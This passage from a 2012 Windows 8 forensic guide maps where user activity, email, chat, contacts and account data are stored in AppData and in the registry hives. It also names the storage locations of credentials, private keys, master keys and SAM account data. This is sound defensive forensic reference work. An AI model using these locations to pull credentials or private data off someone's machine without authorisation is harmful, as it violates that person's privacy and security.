spending some time with the new one.  I wanted to go over the Win-
dows 8 UI because I also think it can help us get an idea of what the user’s exp e-
rience was like.  During our fo rensic examinations, we are usually able to dete r-
mine what was important to the user, such as their documents, pictures, Internet 
favorites, etc., because we know where to look.  A majority of us have used Wi n-
dows enough to know common locations we are lik ely to store our data and ge n-
erally look there first.  We may also be able to visualize what this looked like from the user’s perspective (unless you’re lucky enough to get an image of their hard drive to operate in a VM).  Regardless of your method, it gi ves us better awareness 
of where to look for forensic artifacts and other useful data.  
Figure 1  shows t he user’s login/lock screen  will display their calendar, e -mail notif i-
cations, and Facebook notifications, if they have enabled this feature.   
 
 
W 
Figure 1  Windows 8 Login Screen  
 
WINDOWS 8 FORENSIC G UIDE  
4 
Thomson © 2012  There are three options to sign -in to Windows 8 –  traditional sign -in, picture sign -
in, and PIN sign -in.  Picture sign -in allows you to draw a pattern to sign -in to your 
computer  (Figure  2), and PIN sign -in is just that –  using a PIN to sign -in. 
 
 
Figure 2  Windows 8 Picture Sign -In 
 
WINDOWS 8 FORENSIC G UIDE  
5 
Thomson © 2012  The new Start Menu , which also appears to be the Desktop , is much different 
than the traditional Windows Start Menu we are accustomed to , and will 
probably garner a lot of attention (or complaints).  Figure 3  shows that t he 
Start Menu is made up of Tiles, which consists of Metro Apps , which seems to 
be Microsoft’s new term for “programs” in Windows 8.  The default Start 
Menu includes an app for the Windows Store, Internet Explorer 10, a vari ety of 
communications apps, a Map App, a nd a  Weather App.  Several apps are 
available for the user to download from the Windows Store.  
 
 
Figure 3  The Windows 8 Desktop  
WINDOWS 8 FORENSIC G UIDE  
6 
Thomson © 2012  The Windows 8 Desktop  has “Charms ”, which basically  allow you to quickly 
access  Windows f eatures, such as Search, Share, Devices, and Settings (Figure 
4). 
 
 
 From Cha rms , you can access PC Settings .  Many of these settings were ina c-
cessible in Consumer Preview  (but should be accessible when Windows 8 is o f-
ficially released) , but there were a couple of noticeable settings that are “new” 
to Windows 8.  These may  not necessarily  be new features, but Microsoft has 
definitely made Windows 8 more user -friendly  in terms of being able to u n-
derstand what you are  doing to your computer.  
 
Figure 4  More of the Windows 8 Desktop.  Charms are displayed on the right -
hand side.  Charms  
WINDOWS 8 FORENSIC G UIDE  
7 
Thomson © 2012   
 
Figure 5  shows that under “General”, you have two System Restore -like options –  
“Refresh you r PC without affecting your files” and “Reset your  PC and start over”.   
Here’s what happens when you refresh your PC:  
• Your files and personalization settings won’t change  
• Your PC settings will be changed back to their default  
• Apps from Windows Store will be kept  
• Apps you installed from discs or websites will be removed  
• A list of removed apps will be saved on your desktop  
 
Resetting your PC does this:  
• All your personal files and apps will be removed  
• Your PC settings will be changed back to their defaults  
 
 
Figure 5  PC Settings  
WINDOWS 8 FORENSIC G UIDE  
8 
Thomson © 2012  Figure 6 , Figure 7 , and Figure 8  show a couple of other apps you might see:  
 
 
Figure 6  Windows Store  
Figure 7  Messaging App.  Chat conversations from several clients will appear here  
WINDOWS 8 FORENSIC G UIDE  
9 
Thomson © 2012   
 
And Windows wouldn’t be Windows without everyone’s favorite –  the Error 
Screen , or as most of us know it  - the Blue Screen of Death  (Figure 9 ).  Unfo r-
tunately, we are probably all too familiar with this screen and have been fr u-
strated with how quickly the error code zips by before we can even catch a glimpse and before you know it,  your PC is restarting.  
 
Figure 8  The Weather App  
Figure 9  Windows Error Screen  
WINDOWS 8 FORENSIC G UIDE  
10 
Thomson © 2012  But there’s hope!  The error code is now in plain English.  And m aybe we won’t 
be as  angry with Windows  because the new Blue Screen of Death appears to 
empathize with you  (Figure 10 ): 
 
 
Figure 10  The new Windows Error Screen  
WINDOWS 8 FORENSIC G UIDE  
11 
Thomson © 2012  You can access the familiar Windows Desktop  from the Desktop Tile in the 
new  Metro  UI.  Figure 11 shows what the default looks like .  One of the first 
things I noticed  that  was different from  Developer Preview  was  that  in Co n-
sumer Preview , the Start Menu  button was missing.  Since Consumer Preview 
is still a testing platform, it is unknown at this time if the Start Menu button 
will make a re -appearance  whe n the final version hits store shelves later this 
year.  
 
 
Start Menu 
button?  
Figure 11  The familiar Desktop – this is the default desktop background  
WINDOWS 8 FORENSIC G UIDE  
12 
Thomson © 2012  Even though the Start Menu  button is missing, it is still possible to access 
Start Menu items  (Figure 12).  Hovering the mouse in the bottom left- hand 
corner will allow you to access the Metro UI and hovering over the left side of 
the screen will display a list of apps that you’ve used and are currently still running.  T he app at the top -left was the last one used . 
  
 
Running Apps  
Metro Start  MRU App  
Figure 12  Accessing Metro Apps and the Metro Desktop from the traditional 
Desktop  
WINDOWS 8 FORENSIC G UIDE  
13 
Thomson © 2012  Windows Explorer  also has a new look and feel.   Figure 13 shows that Win-
dows Explorer has a tabbed interface, similar to newer versions of Microsoft 
Office.  
 
 
Figure 13  The new tabbed interface  
WINDOWS 8 FORENSIC G UIDE  
14 
Thomson © 2012   
  
WINDOWS 8 FORENSIC G UIDE  
15 
Thomson © 2012  Windows Artifacts  
 
Just like other versions of Windows, Windows 8 contains valu a-
ble information known as “artifacts ”.  The user is oftentimes u n-
aware that the operating system is leaving traces of their activity 
behind that is specific to the ir usage .  Knowing where these art i-
facts are stored can assist us in re -creating th at user account’s  
experience . 
ith the advent of Windows V ista, Microsoft introduced the A pplicatio n 
Data  folder structure, which made it much easier for forensic examiners 
to determine which data belonged to the operating system and which 
data belonged to the user.  
 
Local Folder  
The AppData \Local folder contains data that does not roam with the user.  The 
data that is stored here is usually too large to roam with the user.  This was pr e-
viously known as “ Documents and Settings \%UserName% \Local Se t-
tings \Application Data ” in Windows XP.  Forensically in-
teresting items that can be found here include temporary 
Internet files, Internet history, and several items that are 
new to Windows 8.  The following chart contains locations 
that are of forensic interest in the Local folder.  A majority of these locations will also work with Windows Vista and 
Windows 7 (unless noted  with the Windows 8 icon , which is  found above in the 
Icon K ey). 
     
 
      W 
ICON KEY  
 Windows 8  
 
         More info  
WINDOWS 8 FORENSIC G UIDE  
16 
Thomson © 2012  %Root% \Users \%User %\AppData \Local \ 
Application  Location  Purpose  
 Metro Apps  Microsoft \Windows \Application 
Shortcuts  Apps that are di s-
played on the Metro 
interface  
 IE 10 We b-
sites Visited  Microsoft \InternetExplorer \ 
Recovery \Immersive \Active  
 
AND  
 
Microsoft \InternetExplorer \ 
Recovery \Immersive \Last Active  Websites user visited 
while browsing with 
IE10.  
Taskbar Apps  Microsoft \Windows \Caches  Apps pinned to the 
Desktop  
 Journal 
Notes  Microsoft \Journal \Cache \msnb.dat  Contains a history of 
journal notes created 
by user and their l o-
cation.   
 User -Added 
IE 10 Favorites  Microsoft \Windows \RoamingTiles  Websites the user has 
pinned to their fav o-
rites.   
Internet History  Microsoft \Windows \History \ 
History.IE5 \MSHist01YYYYMMDD  
YYYYMMDD  User’s Internet hist o-
ry.  More research is 
needed as this co n-
tained empty “co n-
tainer.dat” files  
Temporary Internet 
Files  Microsoft \Windows \Temporary Inte r-
net Files \Low \Content.IE5  Stores temporary 
Internet files  
Protect ed Mode 
Temporary Internet 
Files  Microsoft \Windows \Temporary Inte r-
net Files \Virtualized \%Local  
Disk% \Users \%User %\AppData  Storage location of 
temporary Internet 
files when IE runs in 
Protected Mode (not 
to be confused with 
InPrivate Browsing)  
 Desktop  Microsoft \Windows \WinX  Contains link files for 
applications such as 
Device Manager, 
Command Prompt, 
and Run.  
WINDOWS 8 FORENSIC G UIDE  
17 
Thomson © 2012  Application  Location  Purpose  
Windows Sidebar 
Weather App  Microsoft \Windows \Windows Sid e-
bar\Cache \168522d5 -1082 -4df2 -b2f6 -
9185c31f9472  Contains  a XML  file 
with location name 
and zip code as file 
name.  This file can 
contain location 
coordinates, date, 
and time.  This class 
ID is the same for 
Vista/7/8.  
 Metro App 
Web Cache  Packages \%MetroAppName% \AC\ 
INetCache  Contains web cache 
specific to Metro 
App.  
 Metro App 
Cookies  Packages \%MetroAppName% \AC\ 
INetCookies  Contains cookie files 
specific to Metro 
App.  Data is co n-
tained in a text file.  
 Metro App 
Web History  Packages \%MetroAppName% \AC\ 
INetHistory  Contains Internet 
history files  specific 
to Metro App and the 
format of the data is 
consistent with pr e-
vious versions.  
 Metro Set-
tings  Packages \%MetroAppName% \AC\ 
LocalState  Contains settings 
specific to Metro App 
and can be viewed in 
plain text.  
 
   
WINDOWS 8 FORENSIC G UIDE  
18 
Thomson © 2012  Metro Apps  
Figure 14 demonstrates Metro Apps  that are displayed on the Metro 
Desktop  will have a link file  associated with them that will display 
who created the app and the ap p’s location.  This data will be avail-
able in plain text.   In this example, the Micr osoft Bing Map  App was used.  The link 
file tells us that Microsoft is the creator of this app and it is stored under Program 
Files.  
 
  
Figure 14  Plain text output of link file associated with Microsoft Bing Maps app and 
its location   
 
 App Creator  
App Location  
WINDOWS 8  FORENSIC GUIDE  
19 
Thomson © 2012  IE10 Websites Visited  
Figure 15 shows  a Website  I visited while browsing with IE10 . 
These are found in compound DAT files with the file name similar 
to a Class ID.  It is not know at this time if the file name is a Class ID 
as more research needs to be conducted.  Once the file is unpacked, look for en-
tries that are named “TL#”.  These are possibly known as “Travel Logs ” and they 
contain the websites the user visited in plain text  (some of the entry is in hex) .  The 
TL with the highest number is likely  the oldest website visited .  
 
 
Figure 15  Plain text  output of a website visited using IE10  Website  
WINDOWS 8 FORENSIC G UIDE  
20 
Thomson © 2012  Journal Notes  
Journal Notes  is a program that came with Windows 7, but we will 
probably see greater use with Windows 8.  This application main-
tains a DAT file that gives the stored location of Journal Notes 
(Figure 16).    This information is in plain text.  It is unknown at this time if other 
types of infor mation are contained in this DAT file.   
 
 
Figure 16  Microsoft Journal Note’s location     
 
 
WINDOWS 8 FORENSIC G UIDE  
21 
Thomson © 2012  IE10 Pinned Favorites  
This section shows  favorite websites  I pinned to my Metro Desktop  
(Figure 17).  For each Favorite, there is a corresponding link file.  
The file name of this link file is made up of several digits and it is 
unknown at this time as to how this file name is derived.  The link file contains 
plain text output of the website the Favorite Tile belongs to.  
 
 
Figure 17  Plain text output of a Favorite Tile I pinned to my Metro Desktop   
 Pinned Website  
WINDOWS 8 FORENSIC G UIDE  
22 
Thomson © 2012  Desktop Tools  
Desktop  Tools is  similar to the old Start Menu ’s Accessories and 
System Tools folders and is accessible by right -clicking on the task 
bar (Figure 18).  They are br oken down into three groups and each 
application in a group has their own link file  that contains which executable runs 
that application .  It is probable that a user could chang e the tool for a different a p-
plication .  Group 1 contains the Desktop.  Group 2 consists of the Run command, 
Search, Windows Explorer , Control Panel, and Task Manager.  Group 3 is made up 
of Run as Administrator Command Prompt, Command Prompt, Computer Ma n-
agement, Disk Management, Device Manager, System, Event Viewer, Power O p-
tions, Network Connections, and Pr ograms and Features.   
 
 
Desktop Tools  
 
Figure 18  Executable that runs the Control Panel   
WINDOWS 8 FORENSIC G UIDE  
23 
Thomson © 2012  Metro App Web Cache  
Everything is connected to the Internet with a Windows Live A c-
count and each app is considered to be what Windows calls  an 
“immersive” environment.  This means that from within each app, 
you can access other apps, so essentially, that app becomes the operating system.  
As a result of this immersive concept, each app will have its  own Internet artifacts.  
Figure 19 shows  web cache for the Micr osoft Bing Weather App.  
 
 
Figure 19  Microsoft Bing Weather App web cache – contents may vary depending 
on the application  
WINDOWS 8 FORENSIC G UIDE  
24 
Thomson © 2012  Metro App Cookies  
Cookies  can also be found for each Metro App .  Figure 20 shows 
the cookies are text files and the content of a cookie found here is 
similar to any other cookie con tent you might come across.  
 
  
Figure 20  Metro App Cookie for the Chat application  
WINDOWS 8 FORENSIC G UIDE  
25 
Thomson © 2012  Roaming Folder  
The AppData \Roaming folder is independent of the  computer and holds data that 
is specific to the application and roams with the  user’s profile. In Windows XP, this 
data was contained in Documents and Settings \%UserName% \Application Data.   
Artifacts that are of use to us that are found here include applications pinned to 
the Task Bar, cookies, and Internet Explorer downloads history.  
 
%Root% \Users \%User %\AppData \Roaming \ 
Application  Location  Purpose  
Credentials  Credentials  Can contain data 
used by EFSv. 
RSA -based Certi f-
icates  Crypto \RSA  Contains private 
keys for Microsoft 
RSAbased CSPs.  
Also see “Master 
Key”vi. 
Pinned to Task 
Bar  Internet Explorer \Quick Launch \User 
Pinned \TaskBar  Applications the  us-
er pinned to their 
task bar.  Data is 
contained in a link 
file.  
Master Key  Protect \%SID%  Used to encrypt the 
user’s private key.  
Contains the user’s 
Master Key, which 
contains the Pas s-
word Key and the 
backup/restore form 
for the Master Key.  
Data is encrypted 
twice . 
User’s Credentials  Vault  Credentials that are 
used to automatical-
ly logon the user to 
Websites, servers, 
and programsvii.   
Cookies  Windows \Cookies \Low  Internet cookies 
with data contained 
in text files.  
WINDOWS 8 FORENSIC G UIDE  
26 
Thomson © 2012  Application  Location  Purpose  
IE Compatibility 
Mode Cache  Windows \IECompatCache \Low  Contains cache data 
when IE uses Co m-
patibility Mode.   
IE Compatibility 
UA Cache  Windows \IECompatUACache \Low  Unknown at this 
time.  
IE Download Hi s-
tory  Windows \IEDownloadHistory  Contains a history of 
files the user dow n-
loaded.   
IE Top Level D o-
main Cache  Windows \IETldCache  Contains TLDs – us-
er could add “TLDs” 
that may not nece s-
sarily be recognized 
as TLDs.  File format 
data is stored in is 
unknown at this 
time.  
Libraries  Windows \Libraries  Contains info on 
Documents, Music, 
Pictures, etc. and 
whether library is 
pinned, the owner’s 
SID, and the class ID 
of the folder.  Data is 
contained in XML 
format.  
Logon  Windows \Logon  Unknown at this 
time  
Network Shor t-
cuts  Windows \Network Shortcuts  Contains servers u s-
er accessed and 
could also contain 
information about 
user’s internal ne t-
work.  Data output is 
unknown at this 
time.  
Printer Shortcuts  Windows \Printer Shortcuts  Contains shortcuts 
to printers the user 
has added.  Data 
output is unknown 
at this time.  
WINDOWS 8 FORENSIC G UIDE  
27 
Thomson © 2012  Application  Location  Purpose  
InPrivate Filtering  Windows \PrivacIE \Low  Stores URLs to third  
party contentviii.  
This is different from 
InPrivate Browsing.  
Recent User Acti v-
ity Windows \Recent \AutomaticDestinations  Data is stored in 
compound files sim i-
lar to this format:  
“0-9&a -
z.AutomaticDestin - 
ations -ms”.  Can 
contain information 
on user’s web activ i-
ty, files copied, and 
files created.  Files 
within compound 
files have the follo w-
ing structure: “1”, 
“2”, “3”..., “a”, “b”, 
“c”...  
 
   
WINDOWS 8 FORENSIC G UIDE  
28 
Thomson © 2012    
WINDOWS 8 FORENSIC G UIDE  
29 
Thomson © 2012  Communications App  
 
Windows 8 Metro Apps individually store forensically useful i n-
formation about the user’s activityix.  This can be quite handy for 
forensic examiners as it gives us another place to look for data (or 
the absence thereof ) if the user tried to cover  their tracks. 
he Communic ations App  basically include s the user’s e- mail, chat 
clients, Facebook, and other social networking sites.  Anything that can 
allow the user to interact with another person appears to fall under 
“Communicat ions Apps”.   
 
Cache  
Similar to the other Apps, the Communications App  maintain s its own web 
cache, which can be found in the following locationx: 
 
Application  Location  Purpose  
Communication 
App Web Cache  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft .windows  
communicatisapps_8wekyb3d8bbwe \ 
AC\INetCache  Contains items such 
as pictures from pro-
files the user viewed  
  
The cache that is found in this location appears to be data that is specific to a website that was viewed through the Communications App.  In this case, it was all Facebook pictures, to include profile pictures and pictures that were on that account’s page.  
 
  T 
WINDOWS 8 FORENSIC G UIDE  
30 
Thomson © 2012  Cookies  
The Communications App also has cookies .  In the test image I  used for ex-
amining Windows 8, a cookie was found that contained  the offline content  of 
a Facebook chat conversation  between a friend and I  who had just gone o f-
fline while I was responding .  The following location contains cookies for  the 
Communications App:  
 
Application  Location  Purpose  
Communication App 
Cookies  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft. windows  
communicatisapps_8wekyb3d8bbwe \ 
AC\INetCookies  Contains cookies for 
applications co n-
nected with the 
Communications App  
 
 
Figure 21 is an example of what could be found in this location.  In  this image, 
there was a cookie that contained the contents of two offline messages:  
 
  
 The offline messages that were found in this cookie file were typed by me, 
who is the user associated with the Communications App.  In this cookie, it is 
known who the conversation was between, but outside of a testing enviro n-
ment, it is unknown if the contact the user was communicating with can be 
identified.  More research should be conducted on this.  
     
  
Figure 21  Offline M essage 1:  The contents of the unsent message are as follows:  i 
will definitely try to make your graduation.  it’s on my calendar now. where exactly 
is it?  
            
 
WINDOWS 8 FORENSIC G UIDE  
31 
Thomson © 2012  Microsoft Folder  
Digital Certificates  
The Microsoft folder  stores digital certificates , which are used to authenticate 
clients and servers  when surfing the Internet or sending e -mails .  This ensures 
that communications are secure and helps maintain data integrity.  How do 
they work?   See Figure 22 if you’re aware of their existence but unfamiliar with 
how digital certificates work .   
 
Digital certificates link the certificate owner’s identity to a public key and  a 
private key.   These act like cr edentials to authenticate the sender and recei v-
er.  If a sender encrypts a message with their private key, then the receiver 
must decrypt the message with their public key.   
 
Isn’t figuring this 
stuff out super 
fun on a Friday 
night?
-Amanda
Original plain text e -mailDecrypted��� �� ����� 
�   � 
� �  ���� 
��������
�� ��� � 
�������
Encrypted e -mailReceiver’s Public Key
Internet
��� �� ����� 
�   � 
� �  ���� 
��������
�� ��� � 
�������
Encrypted e -mailReceiver’s Private Key Isn’t figuring this 
stuff out super 
fun on a Friday 
night?
-AmandaPlain text e -mail
 
 At a minimum, digital certificates  must contain the following information:
 
• Owner’s public key  
• Owner’s name/alias  
• Expiration date of the certificate  
• Serial number of the certificate  
• Organization t hat issued the certificate  
• Digital signature of issuing organizationxi 
 A majority of this information will be in plain text.  Figure 22  How digital certificates work  
 
WINDOWS 8 FORENSIC G UIDE  
32 
Thomson © 2012  The following location contains digital certificates  for the Communications 
App:  
 
Application  Location  Purpose  
Communication App 
Digital Certificates  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
munic ationsapps_8wekyb3d8bbwe \ 
AC\Microsoft \CryptnetURLCache\ Co
ntent   Contains certificates 
for the Communic a-
tions App  
 
   
WINDOWS 8 FORENSIC G UIDE  
33 
Thomson © 2012   
What’s New  
This same folder, Microsoft, also contains a subfolder called “Internet Explo r-
er”, which contained updates for the user called “What’s New ”.  An example 
of what the user will see is found in  Figure 23xii: 
 
 
Figure 23  The People App will allow the user to see updates, such as those 
belonging to Facebook  
 
WINDOWS 8 FORENSIC G UIDE  
34 
Thomson © 2012  The following is the location in which this data can be viewed:   
 
Application  Location  Purpose  
User’s “What’s 
New ” Updates  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
municationsapps_8wekyb3d8bbwe \ 
AC\Microsoft \Internet Explorer\ DOM - 
Store \%History -Folder% \ micr o-
soft[#].xml  Contains contact i n-
fo, such as e -mail ad-
dresses, physical a d-
dresses, phone nu m-
bers, etc.  
 
Facebook information showed up in the test image I created and included  pic-
tures  that  were uploaded .  Information found in the location in the above ta-
ble includes  date and time, whether the person is a “friend”, and the file up-
loaded.  Figure 24 is an example of what could be contained in the XML filexiii:  
 
 
Figure 24  The “What’s New” feature in the People App will show updates from 
Facebook    
 
WINDOWS 8 FORENSIC G UIDE  
35 
Thomson © 2012  E-mail  
Windows 8 maintains several artifacts pertaining to e -mail that were in the 
user’s account if the account was linked to the Communications app.  One 
such artifact is streams , which “contain the data that is written to a file, and 
that gives more information about a file than a ttributes and properties”xiv.  
The streams that are located here contain the sender’s name, the sender’s e-mail address, the e -mail’s subject, the name of any attachments, the recei v-
er’s name, and the receiver’s e- mail address.   
 The streams  in this image had the following naming convention:  
 
12000001 -9/a-f_##################.eml.OECustomProperty  
                                                              (18 digits)  
 The following location contains streams : 
Application  Location  Purpose  
E-mail Streams from 
User’s Communic a-
tions App  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
municationsapps_8wekyb3d8bbwe \ 
LocalState \Indexed \LiveComm \ 
%User’sWindowsLiveAccount% \ 
%AppCurrentVersion% \Mail  Contains contact  in-
fo, such as e -mail a d-
dresses, physical a d-
dresses, phone nu m-
bers, etc.  
            
 
WINDOWS 8 FORENSIC G UIDE  
36 
Thomson © 2012  Figure 25 is an example of the data you may find in a file ending in 
“eml.OECustomProperty”.  
 
 
The name of the stream used in Figure 25  is:  
 
1200012f_129755557158031487.eml·OECustomProperty  
 
Another interesting find is that in all of these streams  I found that the  time 
and date the e -mail was s ent or received is contained in this data.  It appears 
the date and time is always 106 bytes from the end  of the s tream.  The date is 
contained as  Windows FILETIME  in the time zone that was set on the user’s 
system.  See Figure 26  for an example.  
Figure 25  An example of the data that may be found in the streams fro m the user’s 
email account(s)  Sender’s Name  
Subject  Sender’s 
Address  
Attachment  
Receiver’s  
Name  
Receiver’s  
E-mail Address  
WINDOWS 8 FORENSIC G UIDE  
37 
Thomson © 2012   
 
The name of the e- mail stream is the same name as the EML file, which 
contains the  content of the e -mail.  The EML file in Figure 25 is named 
“1200012f_129755557158031487.eml”.  The name of the stream is 
“1200012f_129755557158031487.eml·OECustomProperty”xv.  The data you  
will see in this file is the subject, the sender’s name, the sender’s e -mail 
addres, the receiver’s name, the receiver’s e- mail address, the importance 
level, and the date and time (UTC +0000) in ASCII ( Figure 27).  The end of the 
EML file will contain the name of any attachments ( Figure 28).  The EM L file 
also contains the content of the message; however, it needs to be converted as the content of the e -mail is Base64 Encoded ( Figure 29 ).   
Figure 26  This is the hex output of the stream.  106 bytes from the end of the stream 
is a group of 8 bytes, which are the date and time for this stream.  
WINDOWS 8 FORENSIC G UIDE  
38 
Thomson © 2012   
 
 
Figure 27  This is the output of the EML file, which directly correlates to Figure 30 Encoding Type  Subject  
Importance 
Level  Date & Time 
(UTC)  
Encoded 
Content  
WINDOWS 8 FORENSIC G UIDE  
39 
Thomson © 2012   
 
 
Figure 28  The name of any e -mail attachments will be located at the end of the file  
  
Figure 29  The contents of the e -mail decoded from Base64  Attachment  
Name  
WINDOWS 8 FORENSIC G UIDE  
40 
Thomson © 2012  User’s Contacts  
With Windows 8 Consumer Preview, I found that the user’s contact inform a-
tion can be associated with an avatar represented by a picture or photo, if 
they have one.    
What’s so great about this?   The Communications App consol i-
dates social networking and mes saging into one place, and as a 
result, the user’s contacts  are stored in one location, along with 
their contact’s picture.   
A Windows 8 user will see their contacts  if they are logged in with a Windows 
Live account and their social networking and messaging accounts are linked similar to  what’s shown in  Figure 30 : 
 
 
Figure 30  How the user will see their contacts.  PII has been omitted  

WINDOWS 8 FORENSIC G UIDE  
41 
Thomson © 2012   
Next , you probably want to attribute a contact with their avatar.  Here’s 
where you can go to do this:  
 
Application  Location  Purpose  
User’s Contacts 
from Communic a-
tions App  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
municationsapps_8wekyb3d8bbwe \ 
LocalState \LiveComm \%User’s 
WindowsLiveEmail Address% \%App - 
CurrentVersion% \DBStore \LogFiles \ 
edb####.log  Contains contact i n-
fo, such as e -mail ad-
dresses, physical a d-
dresses, phone nu m-
bers, etc.  
 
The file “edb.####.log” contains plain text and hex ( Figure 31).  The contact’s 
information appears in plain text.   
 
 
In Figure 31, this example shows that my e -mail account, atho m-
son@xxxx.com, has a contact that  is associated with a User Tile .  A User Tile 
is the picture the contact uses as a profile picture on Facebook or their e -mail 
avatar.  The User Tile tied to this contact is “550d5534 -890b -48cc -8f26 -
8980e5fcc83b ”xvi.   
Once  you have  this information, you can see what picture is being us ed for 
that contact at this next location.  
 
   
Figure 31  Example of some of the cont ents in an “edb.####.log” file  
WINDOWS 8 FORENSIC G UIDE  
42 
Thomson © 2012  Application  Location  Purpose  
User Tile  Associated 
with Contact  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
municationsapps_8wekyb3d8bbwe \ 
LocalState \LiveComm \ %User’sWin -
dowsLiveEmail Address% \%App - 
CurrentVersion% \DBStore \UserTiles  Contains Facebook 
picture or e -mail ava-
tar of contact  
 
Note that the picture you find here is one the contact associated with themselves.  This is not a picture I associated with my contact.  
 
Figure 32 shows what the forensic examiner will see when this location is 
viewed.   
 
 
Figure 32  Example of contents in the “UserTiles” folder.  The highlighted portion is the User 
Tile that was indicated in the contact’s information in Figure 31. 
WINDOWS 8 FORENSIC G UIDE  
43 
Thomson © 2012  The User Tile  can then be viewed and a face can be put with th e name of the 
contact ( Figure 33)xvii. 
 
 
App Settings  
 
The Communications App’s settings are found in “settings.dat”, which needs to be unpacked  because it’s a compound file.  This file can be found at the fo l-
lowing location:  
 
Application  Location  Purpose  
Communications 
App Settings  %Root% \Users \%User% \AppData \Lo
cal\Packages \microsoft.windowscom
municationsapps_8wekyb3d8bbwe \ 
Settings  Contains settings for 
the Communications 
App  
 Once “settings.dat” is unpacked, you  will see folders for the user’s Windows 
Live account, their calendar, chat, e- mail, and people, among others.  Much of 
the contents of the “Settings ” folder are unknown at the time of this writing; 
however, it seems that the last 8 bytes of any of these entries contain the date and time, which is stored as Windows 
FILETIMExviii.   
  
  
Figure 33  A contact’s User Tile    Contact associated with 
550d5534 -890b -48cc -
8f26 -8980e5fcc83b  
WINDOWS 8 FORENSIC G UIDE  
44 
Thomson © 2012   
  
WINDOWS 8 FORENSIC G UIDE  
45 
Thomson © 2012  Windows Registry  
 
As forensic examiners, we should be familiar with the standard 
Windows Registry definition, which  is that it is “[a] central hie-
rarchical database used in Windows... [which is] used to store information that is necessary to configure the system for one or 
more users, applications, and hardware devices ”
xix.  As far as  
finding out what was really going on w ith the system and what 
the user was really doing , the going through the Registry is like 
winning the jackpot . 
ining the Registry  for forensically useful data is certainly a daunting 
task, and flipping through a couple hundred pages or trying to reme m-
ber where a quick reference guide for a certain version of Windows was 
placed is inconvenient.  In this section I will list forensically  
useful locations in the  Windows Registry .  Similar to the 
previous sections, u nless otherwise noted, many of these 
locations are also co mpatible  with Windows Vista and 
Windows 7.   Figure 34 shows there is no cha nge to the R e-
gistry Structure within  Windows 8.  
 
M 
ICON KEY  
         More info  
Figure 34  The Windows 8 Registry as viewed from Regedit  
 Windows 8  
 
WINDOWS 8 FORENSIC G UIDE  
46 
Thomson © 2012  NTUSER.DAT  
NTUSER.DAT  stores information that is specific to the user.  If there are multiple 
user accounts on the computer, there are also multiple NTUSER.DAT  files – one 
for each user.  NTUSER .DAT  stores data that is specific to the user, such as which 
files they  opened, whi ch applications they used, and which websites they visited.  
All of this data can be found here:  
%SystemRoot% \Users \%User% \NTUSER.DAT \Software \Microsoft \ 
 
  Data Stored  Registry Key Location  
Recent Docs  Windows \CurrentVersion \Explorer \Recent Docs  
Recently Opened/Saved 
Files  Windows \CurrentVersion \Explorer \ComDlg32 \ 
OpenSavePidlMRU  
 
Recently Opened/Saved 
Folders  Windows \CurrentVersion \Explorer \ComDlg32 \ 
LastVisitedPidlMRU  
 
Last Visited Folder  Windows \CurrentVersion \Explorer \ComDlg32 \ 
LastVisitedPidlMRULegacy  
 
Recently Used Apps  
(Non -Metro Apps ) Windows \Curre ntVersion \Explorer \ComDlg32 \ 
CIDSizeMRU  
 
Recently Used Apps  with 
Saved Files  Windows \CurrentVersion \Explorer \ComDlg32 \ 
FirstFolder  
 
Recently Run Items  Windows \CurrentVersion \Explorer \Policies \RunMRU  
 
Computer Name  & Vo-
lume S/N  Windows Media \WMSDK \General  
File Extension Associ a-
tions  Windows \CurrentVersion \Explorer \FileExts  
Typed URLs  Microsoft \Internet Explorer \TypedURLs  
 
 Typed URL Time  
(Figure 35 , Figure 36 , 
and Figure 37 ) Microsoft \Internet Explorer \TypedURLsTime  
 
WINDOWS 8 FORENSIC G UIDE  
47 
Thomson © 2012  The Typed URL Time  is stored in binary and represents the number 
of 100 -nanosecond intervals since January 1, 1601 at 00:00:00  
GMT.  The FILETIME stru cture consists of tw o 32 -bit values that 
combine to form a single 64 -bit valuexx.  The URLs found in TypedURLs  (Figure 
35) can be correlated to TypedURLsTime.  The stored value, which is a FILETIME 
object, can give the time down to a fraction of a second from when the user typed 
that specific URL (Refer to Figure 36 and Figure 37).  More research needs to  be 
conducted on this key as at the time of this wri ting, there is very little information 
on TypedURLsTime.  
 
 
Figure 35  The typed URL for “URL 1” in the Typed URLs key is http://www.gwu.edu  
Figure 36  Data is displayed as Windows FILETIME  
WINDOWS 8 FORENSIC G UIDE  
48 
Thomson © 2012   
 
 
Figure 37  URL1 found in TypedURLsTime directly corresponds to URL1 found 
in TypedURLs  
WINDOWS 8 FORENSIC G UIDE  
49 
Thomson © 2012  SAM  
SAM (Security Accounts Manager) stores information that pertains to a c-
counts, whether locally or on a domain.  The SAM key stores user names that 
are used for login  and the user’s RID (Relative  Identifier ) for  each account.  
Data stored in  the  SAM can be foun d here:  
 
%SystemRoot% \Windows \System32 \Config \SAM \Domains \Account \Users  
 
    Data Stored  Registry Key Location  
Last Logon  (Figure 38) F  
 
Last Password Change  
(Figure 39 ) F  
 
Account Expiration  
(Figure 40) F  
 
Last Failed Logon  (Figure 
41) F  
 
User’s RID  (Figure 42) 
 F  
 Internet User 
Name  InternetUserName (Windows Live Account)  
User’s First Name GivenName  
 
User’s Last Name Surname  
 
 User’s Tile  (Figure 
43) UserTile  
 
WINDOWS 8 FORENSIC G UIDE  
50 
Thomson © 2012   
 
 
Figure 38  The user’s last logon time is stored in bytes 0x 8-15 
 
Figure 39  The user’s last password change is stored in bytes 0x 24 -31  
WINDOWS 8 FORENSIC G UIDE  
51 
Thomson © 2012   
 
 
Figure 40  If the user’s account was set to expire, a valid FILETIME would be here  at 0x 32 -39 
 
Figure 41  If the user had a failed logon, a valid FILETIME would be found at 0x 40-47 
WINDOWS 8 FORENSIC G UIDE  
52 
Thomson © 2012   
 
 
Figure 42  The user’s relative identifier (RID), which is the last segment of the SID , is found at 0x 
48-49 
 
Figure 43  The file used for the user’s tile can be found at the end of the UserTile key  
WINDOWS 8 FORENSIC G UIDE  
53 
Thomson © 2012  SYSTEM  
The SYSTEM key contains information about the operating system, such as 
which devices were assigned a drive letter , the name of the computer, time 
zone se tting, and USB devices attached to the system.   It also keeps track of 
control sets, which is “a collection of configuration data needed to control 
system boot”xxi. 
